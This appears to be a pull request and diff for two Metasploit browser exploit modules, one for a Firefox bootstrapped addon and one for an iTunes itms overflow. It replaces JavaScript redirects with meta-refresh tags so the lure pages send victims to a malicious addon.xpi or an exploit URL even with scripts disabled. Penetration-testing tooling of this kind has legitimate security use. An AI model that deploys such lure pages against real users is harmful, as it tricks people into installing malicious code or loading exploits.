Addresses #8674

This type of redirection will work without javascript being enabled.

Modules:
multi/browser/firefox_xpi_bootstrapped_addon
multi/browser/itms_overflow

More info on the meta element:
https://developer.mozilla.org/en-US/docs/Web/HTML/Element/meta

modules/exploits/multi/browser/firefox_xpi_bootstrapped_addon.rb

@@ -65,9 +65,9 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def generate_html
-    html  = %Q|<html><head><title>Loading, Please Wait...</title></head>\n|
+    html  = %Q|<html><head><title>Loading, Please Wait...</title>\n|
+    html << %Q|<meta http-equiv="refresh" content="0; url=addon.xpi"></head>\n|
     html << %Q|<body><center><p>Addon required to view this page. <a href="addon.xpi">[Install]</a></p></center>\n|
-    html << %Q|<script>window.location.href="addon.xpi";</script>\n|
     html << %Q|</body></html>|
     return html
   end

modules/exploits/multi/browser/itms_overflow.rb

@@ -98,11 +98,14 @@ class MetasploitModule < Msf::Exploit::Remote
     # Return back an example URL.  Using an iframe doesn't work with all
     # browsers, but that's easy enough to fix if you need to.
     return String(<<-EOS)
-<html><head><title>iTunes loading . . .</title></head>
+<html>
+<head>
+<title>iTunes loading . . .</title>
+<meta http-equiv="refresh" content="0; url='#{itms_base_url}'">
+</head>
 <body>
 <p>iTunes should open automatically, but if it doesn't, click to
 <a href="#{itms_base_url}">continue</a>.</p>
-<script>document.location.assign("#{itms_base_url}");</script>
 </body>
 </html>
 EOS